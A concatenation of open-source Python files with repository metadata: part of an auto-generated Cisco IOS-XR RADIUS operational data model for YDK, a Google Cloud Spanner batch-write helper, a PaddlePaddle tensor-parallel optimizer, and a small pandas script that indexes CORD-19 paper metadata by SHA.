''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.accounting is not None and self.accounting._has_data():
return True
if self.family is not None:
return True
if self.ip_address is not None:
return True
if self.port is not None:
return True
if self.server_address is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.Accounting.AccountingGroup']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:accounting'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.accounting_group is not None:
for child_ref in self.accounting_group:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.Accounting']['meta_info']
class ServerGroups(object):
"""
RADIUS server group table
.. attribute:: server_group
RADIUS server group data
**type**\: list of :py:class:`ServerGroup <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.ServerGroups.ServerGroup>`
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.server_group = YList()
self.server_group.parent = self
self.server_group.name = 'server_group'
class ServerGroup(object):
"""
RADIUS server group data
.. attribute:: server_group_name <key>
Group name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
.. attribute:: dead_time
Dead time in minutes
**type**\: int
**range:** 0..4294967295
**units**\: minute
.. attribute:: groups
Number of groups
**type**\: int
**range:** 0..4294967295
.. attribute:: server_group
Server groups
**type**\: list of :py:class:`ServerGroup_ <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.ServerGroups.ServerGroup.ServerGroup_>`
.. attribute:: servers
Number of servers
**type**\: int
**range:** 0..4294967295
.. attribute:: vrf_name
VRF name
**type**\: str
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.server_group_name = None
self.dead_time = None
self.groups = None
self.server_group = YList()
self.server_group.parent = self
self.server_group.name = 'server_group'
self.servers = None
self.vrf_name = None
class ServerGroup_(object):
"""
Server groups
.. attribute:: accounting
Accounting data
**type**\: :py:class:`Accounting <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.ServerGroups.ServerGroup.ServerGroup_.Accounting>`
.. attribute:: accounting_port
Accounting port
**type**\: int
**range:** 0..4294967295
.. attribute:: authentication
Authentication data
**type**\: :py:class:`Authentication <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.ServerGroups.ServerGroup.ServerGroup_.Authentication>`
.. attribute:: authentication_port
Authentication port
**type**\: int
**range:** 0..4294967295
.. attribute:: authorization
Authorization data
**type**\: :py:class:`Authorization <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.ServerGroups.ServerGroup.ServerGroup_.Authorization>`
.. attribute:: family
IP address Family
**type**\: str
.. attribute:: ip_address
IP address buffer
**type**\: str
.. attribute:: is_private
True if private
**type**\: bool
.. attribute:: server_address
Server address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.accounting = Radius.Nodes.Node.ServerGroups.ServerGroup.ServerGroup_.Accounting()
self.accounting.parent = self
self.accounting_port = None
self.authentication = Radius.Nodes.Node.ServerGroups.ServerGroup.ServerGroup_.Authentication()
self.authentication.parent = self
self.authentication_port = None
self.authorization = Radius.Nodes.Node.ServerGroups.ServerGroup.ServerGroup_.Authorization()
self.authorization.parent = self
self.family = None
self.ip_address = None
self.is_private = None
self.server_address = None
class Accounting(object):
"""
Accounting data
.. attribute:: acct_incorrect_responses
Number of incorrect accounting responses
**type**\: int
**range:** 0..4294967295
.. attribute:: acct_response_time
Average response time for authentication requests
**type**\: int
**range:** 0..4294967295
.. attribute:: acct_server_error_responses
Number of server error accounting responses
**type**\: int
**range:** 0..4294967295
.. attribute:: acct_transaction_failure
Number of failed authentication transactions
**type**\: int
**range:** 0..4294967295
.. attribute:: acct_transaction_successess
Number of succeeded authentication transactions
**type**\: int
**range:** 0..4294967295
.. attribute:: acct_unexpected_responses
Number of unexpected accounting responses
**type**\: int
**range:** 0..4294967295
.. attribute:: bad_authenticators
Number of bad accounting authenticators
**type**\: int
**range:** 0..4294967295
.. attribute:: bad_responses
Number of bad accounting responses
**type**\: int
**range:** 0..4294967295
.. attribute:: dropped_responses
Number of accounting responses dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: pending_requests
Number of pending accounting requests
**type**\: int
**range:** 0..4294967295
.. attribute:: requests
Number of accounting requests
**type**\: int
**range:** 0..4294967295
.. attribute:: responses
Number of accounting responses
**type**\: int
**range:** 0..4294967295
.. attribute:: retransmits
Number of retransmitted accounting requests
**type**\: int
**range:** 0..4294967295
.. attribute:: rtt
Round trip time for accounting in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: timeouts
Number of accounting packets timed\-out
**type**\: int
**range:** 0..4294967295
.. attribute:: unknown_packet_types
Number of packets received with unknown type from accounting server
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.acct_incorrect_responses = None
self.acct_response_time = None
self.acct_server_error_responses = None
self.acct_transaction_failure = None
self.acct_transaction_successess = None
self.acct_unexpected_responses = None
self.bad_authenticators = None
self.bad_responses = None
self.dropped_responses = None
self.pending_requests = None
self.requests = None
self.responses = None
self.retransmits = None
self.rtt = None
self.timeouts = None
self.unknown_packet_types = None
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:accounting'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.acct_incorrect_responses is not None:
return True
if self.acct_response_time is not None:
return True
if self.acct_server_error_responses is not None:
return True
if self.acct_transaction_failure is not None:
return True
if self.acct_transaction_successess is not None:
return True
if self.acct_unexpected_responses is not None:
return True
if self.bad_authenticators is not None:
return True
if self.bad_responses is not None:
return True
if self.dropped_responses is not None:
return True
if self.pending_requests is not None:
return True
if self.requests is not None:
return True
if self.responses is not None:
return True
if self.retransmits is not None:
return True
if self.rtt is not None:
return True
if self.timeouts is not None:
return True
if self.unknown_packet_types is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.ServerGroups.ServerGroup.ServerGroup_.Accounting']['meta_info']
class Authentication(object):
"""
Authentication data
.. attribute:: access_accepts
Number of access accepts
**type**\: int
**range:** 0..4294967295
.. attribute:: access_challenges
Number of access challenges
**type**\: int
**range:** 0..4294967295
.. attribute:: access_rejects
Number of access rejects
**type**\: int
**range:** 0..4294967295
.. attribute:: access_request_retransmits
Number of retransmitted access requests
**type**\: int
**range:** 0..4294967295
.. attribute:: access_requests
Number of access requests
**type**\: int
**range:** 0..4294967295
.. attribute:: access_timeouts
Number of access packets timed out
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_incorrect_responses
Number of incorrect authentication responses
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_response_time
Average response time for authentication requests
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_server_error_responses
Number of server error authentication responses
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_transaction_failure
Number of failed authentication transactions
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_transaction_successess
Number of succeeded authentication transactions
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_unexpected_responses
Number of unexpected authentication responses
**type**\: int
**range:** 0..4294967295
.. attribute:: bad_access_authenticators
Number of bad access authenticators
**type**\: int
**range:** 0..4294967295
.. attribute:: bad_access_responses
Number of bad access responses
**type**\: int
**range:** 0..4294967295
.. attribute:: dropped_access_responses
Number of access responses dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: pending_access_requests
Number of pending access requests
**type**\: int
**range:** 0..4294967295
.. attribute:: rtt
Round trip time for authentication in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: unknown_access_types
Number of packets received with unknown type from authentication server
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.access_accepts = None
self.access_challenges = None
self.access_rejects = None
self.access_request_retransmits = None
self.access_requests = None
self.access_timeouts = None
self.authen_incorrect_responses = None
self.authen_response_time = None
self.authen_server_error_responses = None
self.authen_transaction_failure = None
self.authen_transaction_successess = None
self.authen_unexpected_responses = None
self.bad_access_authenticators = None
self.bad_access_responses = None
self.dropped_access_responses = None
self.pending_access_requests = None
self.rtt = None
self.unknown_access_types = None
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:authentication'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.access_accepts is not None:
return True
if self.access_challenges is not None:
return True
if self.access_rejects is not None:
return True
if self.access_request_retransmits is not None:
return True
if self.access_requests is not None:
return True
if self.access_timeouts is not None:
return True
if self.authen_incorrect_responses is not None:
return True
if self.authen_response_time is not None:
return True
if self.authen_server_error_responses is not None:
return True
if self.authen_transaction_failure is not None:
return True
if self.authen_transaction_successess is not None:
return True
if self.authen_unexpected_responses is not None:
return True
if self.bad_access_authenticators is not None:
return True
if self.bad_access_responses is not None:
return True
if self.dropped_access_responses is not None:
return True
if self.pending_access_requests is not None:
return True
if self.rtt is not None:
return True
if self.unknown_access_types is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.ServerGroups.ServerGroup.ServerGroup_.Authentication']['meta_info']
class Authorization(object):
"""
Authorization data
.. attribute:: author_incorrect_responses
Number of incorrect authorization responses
**type**\: int
**range:** 0..4294967295
.. attribute:: author_request_timeouts
Number of access packets timed out
**type**\: int
**range:** 0..4294967295
.. attribute:: author_requests
Number of access requests
**type**\: int
**range:** 0..4294967295
.. attribute:: author_response_time
Average response time for authorization requests
**type**\: int
**range:** 0..4294967295
.. attribute:: author_server_error_responses
Number of server error authorization responses
**type**\: int
**range:** 0..4294967295
.. attribute:: author_transaction_failure
Number of failed authorization transactions
**type**\: int
**range:** 0..4294967295
.. attribute:: author_transaction_successess
Number of succeeded authorization transactions
**type**\: int
**range:** 0..4294967295
.. attribute:: author_unexpected_responses
Number of unexpected authorization responses
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.author_incorrect_responses = None
self.author_request_timeouts = None
self.author_requests = None
self.author_response_time = None
self.author_server_error_responses = None
self.author_transaction_failure = None
self.author_transaction_successess = None
self.author_unexpected_responses = None
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:authorization'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.author_incorrect_responses is not None:
return True
if self.author_request_timeouts is not None:
return True
if self.author_requests is not None:
return True
if self.author_response_time is not None:
return True
if self.author_server_error_responses is not None:
return True
if self.author_transaction_failure is not None:
return True
if self.author_transaction_successess is not None:
return True
if self.author_unexpected_responses is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.ServerGroups.ServerGroup.ServerGroup_.Authorization']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:server-group'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.accounting is not None and self.accounting._has_data():
return True
if self.accounting_port is not None:
return True
if self.authentication is not None and self.authentication._has_data():
return True
if self.authentication_port is not None:
return True
if self.authorization is not None and self.authorization._has_data():
return True
if self.family is not None:
return True
if self.ip_address is not None:
return True
if self.is_private is not None:
return True
if self.server_address is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.ServerGroups.ServerGroup.ServerGroup_']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
if self.server_group_name is None:
raise YPYModelError('Key property server_group_name is None')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:server-group[Cisco-IOS-XR-aaa-protocol-radius-oper:server-group-name = ' + str(self.server_group_name) + ']'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.server_group_name is not None:
return True
if self.dead_time is not None:
return True
if self.groups is not None:
return True
if self.server_group is not None:
for child_ref in self.server_group:
if child_ref._has_data():
return True
if self.servers is not None:
return True
if self.vrf_name is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.ServerGroups.ServerGroup']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:server-groups'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.server_group is not None:
for child_ref in self.server_group:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.ServerGroups']['meta_info']
class DynamicAuthorization(object):
"""
Dynamic authorization data
.. attribute:: disconnected_invalid_requests
Invalid disconnected requests
**type**\: int
**range:** 0..4294967295
.. attribute:: invalid_coa_requests
Invalid change of authorization requests
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.disconnected_invalid_requests = None
self.invalid_coa_requests = None
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:dynamic-authorization'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.disconnected_invalid_requests is not None:
return True
if self.invalid_coa_requests is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.DynamicAuthorization']['meta_info']
@property
def _common_path(self):
if self.node_name is None:
raise YPYModelError('Key property node_name is None')
return '/Cisco-IOS-XR-aaa-protocol-radius-oper:radius/Cisco-IOS-XR-aaa-protocol-radius-oper:nodes/Cisco-IOS-XR-aaa-protocol-radius-oper:node[Cisco-IOS-XR-aaa-protocol-radius-oper:node-name = ' + str(self.node_name) + ']'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.node_name is not None:
return True
if self.accounting is not None and self.accounting._has_data():
return True
if self.authentication is not None and self.authentication._has_data():
return True
if self.client is not None and self.client._has_data():
return True
if self.dead_criteria is not None and self.dead_criteria._has_data():
return True
if self.dynamic_authorization is not None and self.dynamic_authorization._has_data():
return True
if self.server_groups is not None and self.server_groups._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-aaa-protocol-radius-oper:radius/Cisco-IOS-XR-aaa-protocol-radius-oper:nodes'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.node is not None:
for child_ref in self.node:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-aaa-protocol-radius-oper:radius'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.nodes is not None and self.nodes._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius']['meta_info']
| {
"content_hash": "807e093ce49248a8e468b7eaff86dfd1",
"timestamp": "",
"source": "github",
"line_count": 2190,
"max_line_length": 269,
"avg_line_length": 41.546118721461184,
"alnum_prop": 0.3778493394588178,
"repo_name": "111pontes/ydk-py",
"id": "2975497caad225bb3f147381a6321ddfebbe4ea2",
"size": "90986",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_aaa_protocol_radius_oper.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "7226"
},
{
"name": "Python",
"bytes": "446117948"
}
],
"symlink_target": ""
} |
"""Context manager for Cloud Spanner batched writes."""
from google.cloud.spanner_v1.proto.mutation_pb2 import Mutation
from google.cloud.spanner_v1.proto.transaction_pb2 import TransactionOptions
# pylint: disable=ungrouped-imports
from google.cloud._helpers import _pb_timestamp_to_datetime
from google.cloud.spanner_v1._helpers import _SessionWrapper
from google.cloud.spanner_v1._helpers import _make_list_value_pbs
from google.cloud.spanner_v1._helpers import _metadata_with_prefix
# pylint: enable=ungrouped-imports
class _BatchBase(_SessionWrapper):
"""Accumulate mutations for transmission during :meth:`commit`.
:type session: :class:`~google.cloud.spanner_v1.session.Session`
:param session: the session used to perform the commit
"""
def __init__(self, session):
super(_BatchBase, self).__init__(session)
self._mutations = []
def _check_state(self):
"""Helper for :meth:`commit` et al.
Subclasses must override
:raises: :exc:`ValueError` if the object's state is invalid for making
API requests.
"""
raise NotImplementedError
def insert(self, table, columns, values):
"""Insert one or more new table rows.
:type table: str
:param table: Name of the table to be modified.
:type columns: list of str
:param columns: Name of the table columns to be modified.
:type values: list of lists
:param values: Values to be modified.
"""
self._mutations.append(Mutation(insert=_make_write_pb(table, columns, values)))
def update(self, table, columns, values):
"""Update one or more existing table rows.
:type table: str
:param table: Name of the table to be modified.
:type columns: list of str
:param columns: Name of the table columns to be modified.
:type values: list of lists
:param values: Values to be modified.
"""
self._mutations.append(Mutation(update=_make_write_pb(table, columns, values)))
def insert_or_update(self, table, columns, values):
"""Insert/update one or more table rows.
:type table: str
:param table: Name of the table to be modified.
:type columns: list of str
:param columns: Name of the table columns to be modified.
:type values: list of lists
:param values: Values to be modified.
"""
self._mutations.append(
Mutation(insert_or_update=_make_write_pb(table, columns, values))
)
def replace(self, table, columns, values):
"""Replace one or more table rows.
:type table: str
:param table: Name of the table to be modified.
:type columns: list of str
:param columns: Name of the table columns to be modified.
:type values: list of lists
:param values: Values to be modified.
"""
self._mutations.append(Mutation(replace=_make_write_pb(table, columns, values)))
def delete(self, table, keyset):
"""Delete one or more table rows.
:type table: str
:param table: Name of the table to be modified.
:type keyset: :class:`~google.cloud.spanner_v1.keyset.Keyset`
:param keyset: Keys/ranges identifying rows to delete.
"""
delete = Mutation.Delete(table=table, key_set=keyset._to_pb())
self._mutations.append(Mutation(delete=delete))
class Batch(_BatchBase):
"""Accumulate mutations for transmission during :meth:`commit`.
"""
committed = None
"""Timestamp at which the batch was successfully committed."""
def _check_state(self):
"""Helper for :meth:`commit` et al.
Subclasses must override
:raises: :exc:`ValueError` if the object's state is invalid for making
API requests.
"""
if self.committed is not None:
raise ValueError("Batch already committed")
def commit(self):
"""Commit mutations to the database.
:rtype: datetime
:returns: timestamp of the committed changes.
"""
self._check_state()
database = self._session._database
api = database.spanner_api
metadata = _metadata_with_prefix(database.name)
txn_options = TransactionOptions(read_write=TransactionOptions.ReadWrite())
response = api.commit(
self._session.name,
mutations=self._mutations,
single_use_transaction=txn_options,
metadata=metadata,
)
self.committed = _pb_timestamp_to_datetime(response.commit_timestamp)
return self.committed
def __enter__(self):
"""Begin ``with`` block."""
self._check_state()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""End ``with`` block."""
if exc_type is None:
self.commit()
def _make_write_pb(table, columns, values):
"""Helper for :meth:`Batch.insert` et aliae.
:type table: str
:param table: Name of the table to be modified.
:type columns: list of str
:param columns: Name of the table columns to be modified.
:type values: list of lists
:param values: Values to be modified.
:rtype: :class:`google.cloud.spanner_v1.proto.mutation_pb2.Mutation.Write`
:returns: Write protobuf
"""
return Mutation.Write(
table=table, columns=columns, values=_make_list_value_pbs(values)
)
| {
"content_hash": "1408c02824a74669655d236dee986f0b",
"timestamp": "",
"source": "github",
"line_count": 174,
"max_line_length": 88,
"avg_line_length": 31.632183908045977,
"alnum_prop": 0.6320857558139535,
"repo_name": "tswast/google-cloud-python",
"id": "e62763d7fd7c965fabe531ddbe60ed4f5a5bd0e4",
"size": "6100",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "spanner/google/cloud/spanner_v1/batch.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "1094"
},
{
"name": "Python",
"bytes": "33785371"
},
{
"name": "Shell",
"bytes": "9148"
}
],
"symlink_target": ""
} |
import paddle.static as static
from .meta_optimizer_base import MetaOptimizerBase
from .common import (
CollectiveHelper,
OP_ROLE_KEY,
OP_ROLE_VAR_KEY,
OpRole,
is_backward_op,
is_loss_grad_op,
is_optimizer_op,
)
__all__ = []
class TensorParallelOptimizer(MetaOptimizerBase):
def __init__(self, optimizer):
super().__init__(optimizer)
self.inner_opt = optimizer
self.meta_optimizers_white_list = [
"RecomputeOptimizer",
"AMPOptimizer",
"LarsOptimizer",
"LambOptimizer",
]
self.meta_optimizers_black_list = [
"GraphExecutionOptimizer",
]
self.mp_ring_id = 0
self.global_ring_id = 1
self.dp_ring_id = 2
def _set_basic_info(
self, loss, role_maker, user_defined_optimizer, user_defined_strategy
):
super()._set_basic_info(
loss, role_maker, user_defined_optimizer, user_defined_strategy
)
self.mp_degree = user_defined_strategy.tensor_parallel_configs[
'tensor_parallel_degree'
]
def _can_apply(self):
if not self.role_maker._is_collective:
return False
if self.user_defined_strategy.tensor_parallel:
return True
return False
def _disable_strategy(self, dist_strategy):
dist_strategy.tensor_parallel = False
dist_strategy.tensor_parallel_configs = {}
def _enable_strategy(self, dist_strategy, context):
dist_strategy.tensor_parallel = True
dist_strategy.tensor_parallel_configs = {
"tensor_parallel_degree": 1,
}
def _broadcast_params(self, ring_id, mp_mode):
block = self.startup_program.global_block()
param = None
for param in block.iter_parameters():
if param.is_distributed and mp_mode:
continue
block.append_op(
type='c_broadcast',
inputs={'X': param},
outputs={'Out': param},
attrs={
'ring_id': ring_id,
'root': 0,
OP_ROLE_KEY: OpRole.Forward,
},
)
if not param:
return # no parameter on this device
block.append_op(
type='c_sync_comm_stream',
inputs={'X': param},
outputs={'Out': param},
attrs={'ring_id': ring_id, OP_ROLE_KEY: OpRole.Forward},
)
def _get_process_group_info(self):
# global ring info
self.global_endpoints = self.endpoints
self.global_rank = self.rank
self.global_nranks = self.nranks
# model parallel ring info
self.mp_rank = self.rank % self.mp_degree
self.mp_nranks = self.mp_degree
mp_group = self.rank // self.mp_degree
self.mp_endpoints = [
self.endpoints[i]
for i in range(self.global_nranks)
if i // self.mp_degree == mp_group
]
# data parallel ring info
if self.nranks > self.mp_degree:
self.dp_rank = self.rank // self.mp_degree
self.dp_nranks = self.nranks // self.mp_degree
start_index = self.rank % self.mp_degree
self.dp_endpoints = [
self.endpoints[start_index + i * self.mp_degree]
for i in range(self.dp_nranks)
]
def _init_process_group(self):
self._get_process_group_info()
collective_helper = CollectiveHelper(self.role_maker, wait_port=False)
# Create global ring for all gpus
collective_helper._init_communicator(
self.startup_program,
self.current_endpoint,
self.global_endpoints,
self.global_rank,
self.global_ring_id,
True,
self.global_ring_id,
True,
)
# Create model parallel ring for all gpus
collective_helper._init_communicator(
self.startup_program,
self.current_endpoint,
self.mp_endpoints,
self.mp_rank,
self.mp_ring_id,
True,
self.global_ring_id,
True,
)
self._broadcast_params(self.mp_ring_id, mp_mode=True)
# Create dp rings
if self.nranks > self.mp_degree:
collective_helper._init_communicator(
self.startup_program,
self.current_endpoint,
self.dp_endpoints,
self.dp_rank,
self.dp_ring_id,
True,
self.global_ring_id,
True,
)
self._broadcast_params(self.dp_ring_id, mp_mode=False)
def minimize_impl(
self, loss, startup_program=None, parameter_list=None, no_grad_set=None
):
self.endpoints = self.role_maker._get_trainer_endpoints()
self.current_endpoint = self.endpoints[self.role_maker._worker_index()]
self.startup_program = startup_program
if startup_program is None:
self.startup_program = static.default_startup_program()
optimize_ops, params_grads = self.inner_opt.minimize(
loss, self.startup_program, parameter_list, no_grad_set
)
self.main_program = loss.block.program
self.nranks = len(self.endpoints)
self.rank = self.role_maker._worker_index()
self._init_process_group()
assert self.nranks % self.mp_degree == 0
if self.nranks > self.mp_degree:
# data parallelism
dp_degree = self.nranks // self.mp_degree
self._transpile_main_program(loss, dp_degree)
return optimize_ops, params_grads
def _transpile_main_program(self, loss, dp_degree):
self._insert_loss_grad_ops(loss, dp_degree)
self._insert_allreduce_ops(loss, self.dp_ring_id)
def _insert_loss_grad_ops(self, loss, dp_degree):
"""
In order to keep the learning rate consistent in different numbers of
training workers, we scale the loss grad by the number of workers
"""
block = loss.block
for idx, op in reversed(list(enumerate(block.ops))):
if is_loss_grad_op(op):
loss_grad_var = block.vars[op.output_arg_names[0]]
block._insert_op(
idx + 1,
type='scale',
inputs={'X': loss_grad_var},
outputs={'Out': loss_grad_var},
attrs={
'scale': 1.0 / dp_degree,
OP_ROLE_KEY: OpRole.Backward,
},
)
break
def _insert_allreduce_ops(self, loss, ring_id):
block = loss.block
grad = None
for idx, op in reversed(list(enumerate(block.ops))):
if is_backward_op(op) and OP_ROLE_VAR_KEY in op.attr_names:
op_role_var = op.attr(OP_ROLE_VAR_KEY)
if len(op_role_var) == 0:
continue
assert len(op_role_var) % 2 == 0
offset = idx
for i in range(0, len(op_role_var), 2):
param = block.vars[op_role_var[i]]
grad = block.vars[op_role_var[i + 1]]
if offset == idx:
offset += 1
block._insert_op(
offset,
type='c_sync_calc_stream',
inputs={'X': grad},
outputs={'Out': grad},
attrs={OP_ROLE_KEY: OpRole.Backward},
)
offset += 1
block._insert_op(
offset,
type='c_allreduce_sum',
inputs={'X': grad},
outputs={'Out': grad},
attrs={
'ring_id': ring_id,
OP_ROLE_KEY: OpRole.Backward,
},
)
if grad is None:
return
for idx, op in list(enumerate(block.ops)):
if is_optimizer_op(op):
block._insert_op(
idx,
type='c_sync_comm_stream',
inputs={'X': grad},
outputs={'Out': grad},
attrs={'ring_id': ring_id, OP_ROLE_KEY: OpRole.Backward},
)
break
| {
"content_hash": "03666e5c211379fd48152ef3e12bf752",
"timestamp": "",
"source": "github",
"line_count": 256,
"max_line_length": 79,
"avg_line_length": 33.77734375,
"alnum_prop": 0.5039898230600208,
"repo_name": "PaddlePaddle/Paddle",
"id": "41ef5f6190ebf9d36616e55132110355137c046b",
"size": "9227",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "python/paddle/distributed/fleet/meta_optimizers/tensor_parallel_optimizer.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "58544"
},
{
"name": "C",
"bytes": "210300"
},
{
"name": "C++",
"bytes": "36848680"
},
{
"name": "CMake",
"bytes": "902619"
},
{
"name": "Cuda",
"bytes": "5227207"
},
{
"name": "Dockerfile",
"bytes": "4361"
},
{
"name": "Go",
"bytes": "49796"
},
{
"name": "Java",
"bytes": "16630"
},
{
"name": "Jinja",
"bytes": "23852"
},
{
"name": "MLIR",
"bytes": "39982"
},
{
"name": "Python",
"bytes": "36203874"
},
{
"name": "R",
"bytes": "1332"
},
{
"name": "Shell",
"bytes": "553177"
}
],
"symlink_target": ""
} |
import pandas as pd
from itertools import islice
import pickle
import re
from time import time
t0 = time()
df = pd.read_csv('metadata.csv')
print('columns',list(df))
selected = df[['cord_uid','sha','publish_time','journal','url','title']].where(df['sha'].notna())
meta_by_sha = {}
rows = selected.iterrows()
for _,r in rows:
if type(r['cord_uid']) is float: continue # NaN
for sha in r['sha'].split(';'):
sha = sha.strip()
if not re.match('^[a-f0-9]+$',sha):
print(r)
exit()
meta = {k:r[k] for k in ['cord_uid','publish_time','journal','title']}
meta_by_sha[sha] = meta
pickle.dump(meta_by_sha,open('paper_meta_by_sha.pkl','wb'))
print(f"done in {time()-t0:.01f} seconds")
| {
